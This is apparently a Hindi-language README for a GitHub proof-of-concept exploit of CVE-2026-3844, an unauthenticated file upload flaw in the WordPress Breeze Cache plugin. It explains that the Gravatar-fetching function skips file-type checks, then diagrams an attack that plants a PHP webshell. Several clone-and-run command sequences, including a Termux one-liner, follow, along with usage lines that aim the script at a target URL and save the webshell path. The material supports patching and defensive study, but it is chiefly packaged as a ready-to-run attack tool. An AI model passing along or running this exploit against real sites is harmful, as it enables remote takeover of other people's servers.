
CVE-2026-3844 के लिए PoC एक्सप्लॉइट, जो WordPress Breeze प्लगइन में एक गंभीर बिना प्रमाणीकरण वाली फ़ाइल अपलोड भेद्यता है और RCE की ओर ले जाती है।
CVE-2026-3844 के लिए PoC एक्सप्लॉइट, WordPress Breeze प्लगइन में एक गंभीर बिना प्रमाणीकरण वाली फ़ाइल अपलोड भेद्यता जो RCE की ओर ले जाती है।
CVE-2026-3844 Breeze Cache WordPress प्लगइन (Cloudways द्वारा) में एक गंभीर बिना प्रमाणीकरण वाली मनमानी फ़ाइल अपलोड भेद्यता है, जो 2.4.4 तक के सभी संस्करणों को प्रभावित करती है।
यह रिपॉजिटरी अधिकृत सुरक्षा अनुसंधान, पेनेट्रेशन परीक्षण और जिम्मेदार प्रकटीकरण के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC) एक्सप्लॉइट (CVE-2026-3844.py) प्रदान करती है।
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && python3
| फ़ील्ड | विवरण |
|---|---|
| CVE ID | CVE-2026-3844 |
| प्लगइन | Breeze Cache (Cloudways द्वारा) |
| प्रभावित संस्करण | 2.4.4 तक के सभी संस्करण |
| पैच किया गया संस्करण | Breeze 2.4.5+ |
| भेद्यता प्रकार | CWE-434 — खतरनाक प्रकार की फ़ाइल का असीमित अपलोड |
| CVSS v3.1 स्कोर | 9.8 (CRITICAL) |
| CVSS v2.0 स्कोर | 10.0 (CRITICAL) |
| CVSS वेक्टर | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| हमला वेक्टर | नेटवर्क (रिमोट) |
| प्रमाणीकरण आवश्यक | ❌ कोई नहीं — बिना प्रमाणीकरण |
| शर्त | "Host Files Locally – Gravatars" सक्षम होना चाहिए (डिफ़ॉल्ट रूप से अक्षम) |
| प्रभाव | गोपनीयता: उच्च · अखंडता: उच्च · उपलब्धता: उच्च |
| प्रकाशित | 2026-04-23 |
| स्रोत | Wordfence / NVD / MITRE |
| PoC | Tausif Zaman |
WordPress के लिए Breeze Cache प्लगइन रिमोट Gravatar छवियों को लाता है और उन्हें स्थानीय रूप से संग्रहीत करता है जब "Host Files Locally – Gravatars" सुविधा सक्षम होती है। class-breeze-cache-cronjobs.php (पंक्तियाँ 89–119) में कमजोर फ़ंक्शन fetch_gravatar_from_remote लाए गए रिमोट कंटेंट पर कोई फ़ाइल प्रकार या एक्सटेंशन सत्यापन नहीं करता है।
class-breeze-cache-cronjobs.php
└── fetch_gravatar_from_remote() ← ❌ No file type validation
└── Saves remote content directly to disk
└── Attacker controls → uploads .php webshell → RCE
Attacker (Unauthenticated)
│
▼
Craft malicious HTTP request with PHP webshell URL as Gravatar
│
▼
Plugin fetches & saves the .php file without validation
│
▼
Webshell stored on server (e.g., /wp-content/breeze-cache/evil.php)
│
▼
Attacker accesses webshell → Full RCE achieved
सफलतापूर्वक शोषण किए जाने पर, एक हमलावर यह कर सकता है:
requests लाइब्रेरी# Clone the repository
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && python3 CVE-2026-3844.py
# Navigate into the directory
cd CVE-2026-3844
# Install dependencies
pip install -r requirements.txt
# Run the exploit
python3 CVE-2026-3844.py
git clone https://github.com/tausifzaman/CVE-2026-3844.git
cd CVE-2026-3844
pip install -r requirements.txt
python CVE-2026-3844.py
git clone https://github.com/tausifzaman/CVE-2026-3844.git
cd CVE-2026-3844
pip3 install -r requirements.txt
python3 CVE-2026-3844.py
pkg install python git -y && git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && pip install -r requirements.txt && python3 CVE-2026-3844.py
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && pip install -r requirements.txt && python3 CVE-2026-3844.py
python3 CVE-2026-3844.py
usage: CVE-2026-3844.py [-h] -u URL [-t TIMEOUT] [-o OUTPUT] [-v]
CVE-2026-3844 — Breeze Cache WordPress Plugin Arbitrary File Upload PoC
optional arguments:
-h, --help Show this help message and exit
-u URL, --url URL Target URL (e.g. https://target.com)
-t TIMEOUT Request timeout in seconds (default: 10)
-o OUTPUT Save webshell path to output file
-v, --verbose Enable verbose/debug output
# Basic usage
python3 CVE-2026-3844.py -u https://vulnerable-site.com
# Verbose mode
python3 CVE-2026-3844.py -u https://vulnerable-site.com -v
# Custom timeout
python3 CVE-2026-3844.py -u https://vulnerable-site.com -t 20 -v
╔══════════════════════════════════════════════════════╗
║ CVE-2026-3844 | Breeze Cache WP RCE ║
║ Researcher: tausifzaman.online ║
╚══════════════════════════════════════════════════════╝